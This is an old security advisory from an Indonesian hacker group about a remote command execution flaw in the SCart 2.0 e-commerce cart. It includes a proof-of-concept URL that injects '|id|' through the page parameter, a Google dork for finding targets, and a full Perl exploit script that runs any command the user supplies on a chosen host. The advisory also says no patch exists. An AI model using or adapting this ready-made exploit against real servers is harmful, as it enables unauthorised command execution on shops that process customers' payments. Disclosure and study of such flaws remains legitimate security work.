____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_32$2006 --------------------------------------------------------------------------- [ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution --------------------------------------------------------------------------- Author : M.Hasran Addahroni a.k.a K-159 Date : June, 3th 2006 Location : Indonesia, Bali Web : http://advisories.echo.or.id/adv/adv32-K-159-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SCart Application : SCart version : 2.0 URL : http://www.scartserver.com Description : SCart is a free shopping cart online store service with e-commerce and real-time credit card and check payment processing service. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~~~~ In scart.cgi we have source code like this -----------------------scart.cgi----------------------------- ... require 'scart.pl'; require '/home/scart/cgi-bin/2.0/scartserver.cgi'; ... -------------------------------------------------------------- then at scartserver.cgi in cgi-bin folder the code like this ---------------scartserver.cgi-------------------------------- ... $HTML{TAB2} = "$baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt"; $HTML{TAB3} = "$baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.txt"; $HTML{BUTTONBAR} = $buttonbar; $HTML{VIEWCART} = "$baseurl$cgiurl?action=viewcart"; $HTML{CHECKOUT} = "$secureurl$cgiurl?action=checkout"; $HTML{TRACK} = "$baseurl$cgiurl?action=show_track"; $HTML{HELP} = "$baseurl$cgiurl/?action=show_page&base=base.html&page=help.txt"; ... ------------------------------------------------------------------ Variables $baseurl and $cgiurl are not properly sanitized.This can be used to execute arbitrary commands. Proof Of Concept: ~~~~~~~~~~~~~~~~~ http://www.scartserver.com/2.0/[client_user_name]/scart.cgi/?action=show_page&base=base2.html&page=|id| Solution: ~~~~~~~~~ no solution yet Notification: ~~~~~~~~~~~~ vendor was contact but no response. --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ ping - my dearest wife, for all the luv the tears n the breath ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw ~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit ~ newbie_hacker@yahoogroups.com ~ #aikmel #e-c-h-o @irc.dal.net --------------------------------------------------------------------------- Contact: ~~~~~~~~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: http://k-159.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------- Perl Exploit: ~~~~~~~~~~~~ #!/usr/bin/perl ## # SCart 2.0 Remote Code Execution Exploit # Bugs Found & code By K-159 # ## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt # # echo.or.id (c) 2006 # ## # usage: # perl scart.pl "cmd" # # Google Dork : site:scartserver.com # # Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc # # Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net # use IO::Socket; use LWP::Simple; sub Usage { print STDERR "\n ========================================================= \r\n"; print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n"; print STDERR " Bugs Found by K-159 \r\n"; print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; print STDERR " Usage: $0 \"cmd\" \r\n"; print STDERR "============================================================= \r\n"; exit; } if (@ARGV < 3) { Usage(); } $host = @ARGV[0]; $path = @ARGV[1]; $command = @ARGV[2]; print "\n[+] Conecting to $host\n"; my $result = get("http://$host$path/scart.cgi?action=show_page&base=base2.html&page=browse.txt|$command|"); if (defined $result) { print $result; } else { print "Exploit Failed.\n"; }